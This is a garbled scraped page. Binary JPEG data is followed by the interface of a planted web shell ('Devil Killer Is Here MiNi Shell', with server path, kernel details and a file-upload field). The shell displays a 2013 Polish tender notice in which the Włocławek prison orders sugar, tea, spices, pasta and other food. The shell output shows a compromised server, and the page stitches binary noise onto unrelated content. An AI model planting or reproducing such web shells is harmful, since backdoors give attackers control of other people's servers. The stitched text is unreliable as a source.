JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131023/222209-N-2013.html

<p class="kh_header"><b>Włocławek: Dostawa różnych produktów spożywczych, znak sprawy D/Kw-220/15/2013</b><br>
<b>Numer ogłoszenia: 222209 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny we Włocławku , ul. Bartnicka 10, 87-809 Włocławek, woj. kujawsko-pomorskie, tel. 054 2355055, faks 054 2354063.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych, znak sprawy D/Kw-220/15/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Grupa I
1) cukier  biały kryształ - w ilości 13 000 kg, w opakowaniach jednostkowych po 1 kg. Realizacja dostaw odbywać się będzie sukcesywnie, w zależności od potrzeb Zamawiającego, nie częściej niż jeden raz w tygodniu, do magazynu zamawiającego transportem wykonawcy i na jego koszt.  Dostawca zobowiązany jest dostarczać zamawiany towar w ciągu  3 dni roboczych od dnia otrzymania zamówienia. Dostawy winny być realizowane w godzinach od 8:00 do 12:00, w dniach pracy Zamawiającego. Nomenklatura CPV:15831000-2, Polska Norma: PN-A-74850:1996/Az1:2005
2. Grupa II
1) herbata granulowana - czarna, o parametrach jakościowych nie gorszych niż herbata INDYJSKA, w opakowaniach jednostkowych 100g. Szacunkowa ilość zapotrzebowania - 600 kg. Nomenklatura CPV: 15863000-5, Polska Norma: PN-ISO 3720:1997/Ap1:2004
2) kawa zbożowa - pakowana w workach po 25 kg. Szacunkowa ilość zapotrzebowania - 1400 kg.  Nomenklatura CPV:15860000-4, Polska Norma: PN-A-94013:1998/Az1:2001
3) herbata miętowa liściasta (luz) - pakowana w workach 10-25 kg. Szacunkowa ilość zapotrzebowania - 500 kg.  Nomenklatura CPV:15860000-4, Polska Norma
4) musztarda - o parametrach jakościowych nie  gorszych niż musztarda SAREPSKA, w opakowaniach jednostkowych 5kg. Szacunkowa ilość zapotrzebowania - 1100kg. Nomenklatura CPV:15871250-1, Polska Norma: PN-A-86964:2002/Az1:2004.
5) ketchup łagodny - o parametrach jakościowych nie gorszych niż KETCHUP WŁOCŁAWSKI, w opakowaniach jednostkowych nie większych niż 5 kg. Szacunkowa ilość zapotrzebowania - 700 kg. Nomenklatura CPV:15871230-5, Polska Norma: PN-A-86951:2006.
6) majonez - o parametrach jakościowych nie gorszych niż majonez POMORSKI, w słoikach o pojemności 0,7 kg - 2,0 kg. Szacunkowa ilość zapotrzebowania - 900 kg Nomenklatura CPV: 15871273-8, Polska Norma: PN-A-86964:2002/Az1:2002.
7) ocet spirytusowy 10% - w butelkach 0,5l. Szacunkowa ilość zapotrzebowania - 800 l. Nomenklatura CPV:15871110-8, Polska Norma: PN-EN-13188:2002/AC:2003.
8) majeranek - przetarty, suszony, o swoistej barwie, w opakowaniach jednostkowych 1kg. Szacunkowa ilość zapotrzebowania - 100 kg. Nomenklatura CPV: 15872300-4, Polska Norma:  PN-A-86958 :1997/Az1:2002
9) papryka słodka - mielona, w opakowaniach jednostkowych 1 kg.  Szacunkowa ilość zapotrzebowania - 200 kg. Nomenklatura CPV: 15870000-7, Polska Norma: PN-A-86955:1997/Az1:2002
10) pieprz mielony - czarny, w opakowaniach jednostkowych 1 kg. Szacunkowa ilość zapotrzebowania 160 kg. Nomenklatura CPV:15872100-2, Polska Norma: PN-A-86965: 1997/Az1:2002
11) sól - jodowana, drobnoziarnista, w opakowaniach jednostkowych 1 kg. Szacunkowa ilość zapotrzebowania 4200 kg. Nomenklatura CPV:15872400-5, Polska Norma: PN-C-84081-2:1998
12) susz kopru  - w opakowaniach jednostkowych max. 5 kg. Szacunkowa ilość zapotrzebowania 100 kg. Nomenklatura CPV:15890000-3, Polska Norma: PN-VI-740101:1999
13) przyprawa do zup w płynie - o parametrach jakościowych nie gorszych niż przyprawa  MAGI, w opakowaniach jednostkowych nie mniejszych niż 1 l. Szacunkowa ilość zapotrzebowania - 2 500 l. Nomenklatura CPV:15870000-7, Polska Norma: PN-A-86967:1998/Az1:2002
14) rosół z kury - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 2800 kg. Nomenklatura CPV:15891500-5, Polska Norma: PN-A-94052:1996
15) zupa pieczarkowa - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 300 kg. Nomenklatura CPV:15891400-4, Polska Norma: PN-A-94050:1996.
16) żurek - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 500 kg. Nomenklatura CPV:15891400-4, Polska Norma: PN-A-94050:1996.
17) sos grzybowy - w postaci koncentratu, w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 300 kg. Nomenklatura CPV: 15871200-6, Polska Norma: PN-A-94050:1996.
18) ryż długoziarnisty biały - w opakowaniach jednostkowych nie mniejszych niż  1kg. Szacunkowa ilość zapotrzebowania 6 000  kg. Nomenklatura CPV:15614100-6, Polska Norma: PN-A-74220:1997, PN-ISO 7301:2004
19) budyń waniliowy - bez cukru, w opakowaniach jednostkowych nie mniejszych niż 5kg. Szacunkowa ilość zapotrzebowania 350  kg. Nomenklatura CPV:15800000-6.
20) kisiel wiśniowy - bez cukru, w opakowaniach jednostkowych nie mniejszych niż 5kg. Szacunkowa ilość zapotrzebowania 300  kg. Nomenklatura CPV:15800000-6.
21) Granulat sojowy - 1 200 kg, pakowany w opakowaniach max. 15kg. CPV: 15890000-3.
22) Kostka sojowa - 600 kg, pakowana w opakowaniach max. 20kg. CPV: 15890000-3.
23) Kotlet sojowy - 350 kg; o wadze 10-20g sztuka i grubości ok. 10 mm, w całości nie pokruszony, pakowany w opakowaniach max. po 10kg. CPV: 15890000-3.
24) czosnek mielony - w opakowaniach jednostkowych 1 kg.  Szacunkowa ilość zapotrzebowania - 45 kg. Nomenklatura CPV: 15870000-7, Polska Norma: PN-A-86967:1998/Az1:2002      
Pozycje wyszczególnione w pkt.2 ppkt. 1-24, realizacja dostaw odbywać się będzie sukcesywnie, w zależności od potrzeb Zamawiającego, nie częściej niż jeden raz w tygodniu, do magazynu zamawiającego transportem wykonawcy i na jego koszt. Dostawca zobowiązany jest dostarczać zamawiane towary w ciągu 3 dni roboczych od dnia otrzymania zamówienia. Dostawy winny być realizowane w godzinach od 8:00 do 12:00, w dniach pracy Zamawiającego.
3. Grupa III
1) makaron kolanka - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż 10 kg. Szacunkowa ilość zapotrzebowania 5 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999.
2) makaron świderki - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż 10 kg. Szacunkowa ilość zapotrzebowania 5 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999.
3) makaron wstążki - jajeczny, o barwie żółtej, w opakowaniach jednostkowych nie mniejszych niż 10 kg. Szacunkowa ilość zapotrzebowania 3 000 kg. Nomenklatura CPV: 15851100-9, Polska Norma: PN-A-74131:1999.
Pozycje wyszczególnione w pkt. 3 ppkt. 1-3, realizacja dostaw odbywać się będzie sukcesywnie,  w zależności od potrzeb Zamawiającego, nie częściej niż jeden raz w tygodniu, do magazynu zamawiającego transportem wykonawcy i na jego koszt. Dostawca zobowiązany jest dostarczać zamawiane towary w ciągu 3 dni roboczych od dnia otrzymania zamówienia. Dostawy winny być realizowane w godzinach od 8:00 do 12:00, w dniach pracy Zamawiającego.
4. Grupa IV
1) pierogi - nadziewane serem, mrożone,  w opakowaniach jednostkowych nie mniejszych niż 3 kg. Szacunkowa ilość zapotrzebowania 380 kg. Nomenklatura CPV:15894000-1.
2) pyzy ziemniaczane - mrożone, w opakowaniach jednostkowych nie mniejszych niż 3 kg Szacunkowa ilość zapotrzebowania 3 500 kg. Nomenklatura CPV:15894000-1.
Pozycje wyszczególnione w pkt. 4 ppkt. 1-2, realizacja dostaw odbywać się będzie sukcesywnie,  w zależności od potrzeb Zamawiającego, nie częściej niż jeden raz w tygodniu, do magazynu zamawiającego transportem wykonawcy i na jego koszt. Dostawca zobowiązany jest dostarczać zamawiane towary w ciągu  3 dni roboczych od dnia otrzymania zamówienia. Dostawy winny być realizowane w godzinach od 8:00 do 12:00, w dniach pracy Zamawiającego.
5.Grupa V
1) kasza jęczmienna średnioziarnista - w opakowaniach jednostkowych nie mniejszych niż 1kg. Szacunkowa ilość zapotrzebowania 3 500  kg. Nomenklatura CPV: 15613000-8, Polska Norma:  PN-87/A-74203
2) kasza manna - w opakowaniach jednostkowych nie mniejszych niż  1kg. Szacunkowa ilość zapotrzebowania 2 800 kg. Nomenklatura CPV: 15613000-8, Polska Norma: PN-88/A-74036
3) mąka pszenna typ 550 - w opakowaniach jednostkowych nie mniejszych niż 1kg. Szacunkowa ilość zapotrzebowania 5 800  kg. Nomenklatura CPV:15612100-2 , Polska Norma: PN-A-74022:2003
Pozycje wyszczególnione w pkt.5 ppkt. 1-3, realizacja dostaw odbywać się będzie sukcesywnie,  w zależności od potrzeb Zamawiającego, nie częściej niż jeden raz w tygodniu, do magazynu zamawiającego transportem wykonawcy i na jego koszt. Dostawca zobowiązany jest dostarczać zamawiane towary w ciągu 3 dni roboczych od dnia otrzymania zamówienia. Dostawy winny być realizowane w godzinach od 8:00 do 12:00, w dniach pracy Zamawiającego.
6. Integralną częścią opisu przedmiotu zamówienia są postanowienia zawarte we wzorze umowy, który stanowi załącznik do specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.85.11.00-9, 15.61.10.00-4, 15.89.40.00-1, 15.89.00.00-3, 15.61.21.00-2, 15.61.30.00-8, 15.86.00.00-4, 15.87.12.73-8, 15.86.30.00-5, 15.87.00.00-7, 15.80.00.00-6, 15.87.14.00-4, 15.87.24.00-5, 15.87.12.50-1, 15.87.21.00-2, 15.87.12.30-5, 15.87.12.00-6, 15.87.11.10-8, 15.87.23.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie,                       o spełnianiu warunków udziału  w postępowaniu (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie,                       o spełnianiu warunków udziału  w postępowaniu (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie,                       o spełnianiu warunków udziału  w postępowaniu (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie,                       o spełnianiu warunków udziału  w postępowaniu (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie,                       o spełnianiu warunków udziału  w postępowaniu (załącznik nr 2 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1. Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz.U.               z 2013r. poz. 907 z późn. zm.).2. Zmiany postanowień  umowy mogą dotyczyć w szczególności:1) nazwy, adresu oraz osób reprezentujących strony;2) cen artykułów wymienionych w załączniku nr 1 do umowy, zgodnie z postanowieniami § 5 ust. 1  umowy;3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;4) każdej zmiany, która jest korzystna lub neutralna dla Zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego. 3. Zmiany postanowień  umowy wymagają potwierdzenia pisemnego w postaci aneksu. 4. Strona wnioskująca o zmianę postanowień  umowy na podstawie ust.2, niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi                       i prawnymi oraz przedkłada propozycje aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny we Włocławku, ul. Bartnicka 10, 87-809 Włocławek..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2013 godzina 11:00, miejsce: w siedzibie zamawiającego tj. Zakład Karny we Włocławku, ul. Bartnicka 10, 87-809 Włocławek, w sekretariacie - pokój nr 205..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) cukier  biały kryształ - w ilości 13 000 kg, w opakowaniach jednostkowych po 1 kg.
Nomenklatura CPV:15831000-2, Polska Norma: PN-A-74850:1996/Az1:2005.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) herbata granulowana - czarna, o parametrach jakościowych nie gorszych niż herbata INDYJSKA, w opakowaniach jednostkowych 100g. Szacunkowa ilość zapotrzebowania - 600 kg. Nomenklatura CPV: 15863000-5, Polska Norma: PN-ISO 3720:1997/Ap1:2004
2) kawa zbożowa - pakowana w workach po 25 kg. Szacunkowa ilość zapotrzebowania - 1400 kg. Nomenklatura CPV:15860000-4, Polska Norma: PN-A-94013:1998/Az1:2001
3) herbata miętowa liściasta (luz) - pakowana w workach 10-25 kg. Szacunkowa ilość zapotrzebowania - 500 kg.  Nomenklatura CPV:15860000-4, Polska Norma
4) musztarda - o parametrach jakościowych nie  gorszych niż musztarda SAREPSKA, w opakowaniach jednostkowych 5kg. Szacunkowa ilość zapotrzebowania - 1100kg. Nomenklatura CPV:15871250-1, Polska Norma: PN-A-86964:2002/Az1:2004.
5) ketchup łagodny - o parametrach jakościowych nie gorszych niż KETCHUP WŁOCŁAWSKI, w opakowaniach jednostkowych nie większych niż 5 kg. Szacunkowa ilość zapotrzebowania - 700 kg. Nomenklatura CPV:15871230-5, Polska Norma: PN-A-86951:2006.
6) majonez - o parametrach jakościowych nie gorszych niż majonez POMORSKI, w słoikach o pojemności 0,7 kg - 2,0 kg. Szacunkowa ilość zapotrzebowania - 900 kg Nomenklatura CPV: 15871273-8, Polska Norma: PN-A-86964:2002/Az1:2002.
7) ocet spirytusowy 10% - w butelkach 0,5l. Szacunkowa ilość zapotrzebowania - 800 l. Nomenklatura CPV:15871110-8, Polska Norma: PN-EN-13188:2002/AC:2003.
8) majeranek - przetarty, suszony, o swoistej barwie, w opakowaniach jednostkowych 1kg. Szacunkowa ilość zapotrzebowania - 100 kg. Nomenklatura CPV: 15872300-4, Polska Norma:  PN-A-86958 :1997/Az1:2002
9) papryka słodka - mielona, w opakowaniach jednostkowych 1 kg.  Szacunkowa ilość zapotrzebowania - 200 kg. Nomenklatura CPV: 15870000-7, Polska Norma: PN-A-86955:1997/Az1:2002
10) pieprz mielony - czarny, w opakowaniach jednostkowych 1 kg. Szacunkowa ilość zapotrzebowania 160 kg. Nomenklatura CPV:15872100-2, Polska Norma: PN-A-86965: 1997/Az1:2002
11) sól - jodowana, drobnoziarnista, w opakowaniach jednostkowych 1 kg. Szacunkowa ilość zapotrzebowania 4200 kg. Nomenklatura CPV:15872400-5, Polska Norma: PN-C-84081-2:1998
12) susz kopru  - w opakowaniach jednostkowych max. 5 kg. Szacunkowa ilość zapotrzebowania 100 kg. Nomenklatura CPV:15890000-3, Polska Norma: PN-VI-740101:1999
